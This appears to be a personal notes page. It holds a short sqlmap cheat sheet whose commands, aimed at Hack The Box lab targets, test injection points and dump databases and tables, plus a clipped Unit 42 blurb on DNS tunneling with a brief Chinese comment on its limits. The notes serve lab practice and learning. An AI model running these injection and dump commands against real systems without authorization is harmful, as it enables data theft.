sqlmap >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch batch means never ask user input, use the default behavior >sqlmap -u http://htb/administrative --data "uname=123&password=456" --privileges Retrieve the privileges the current user is having. For example, read the FILE >sqlmap -u http://htb/administrative --data "uname=123&password=456" --batch Test Post parameter by data option >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch --dbs fetch the DB information >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch --tables -D [DB name] Fetch tables in a specific DB >sqlmap -u plugins/lcars/lcars_db.php?query=1 --batch --dump -T [Table name] -D [DB name]...

DNS Tunneling: how DNS can be (ab)used by malicious actorsDNS is a critical foundation of the Internet that makes it possible to get to websites without entering numerical IP addresses. The power that makes DNS beneficial for everyone also creates potential for abuse. Unit 42 researchers explain how attackers can abuse DNS to hide their tracks and steal da… 感覺上不是一個可以單獨使出的招式, 攻擊者必須掌控DNS server才能發動.中間只要有個Big-IP F5或是任何過濾DNS traffic這攻擊就GG了. 不過實際上的攻擊總是各種組合拳, 所以還是不能小看...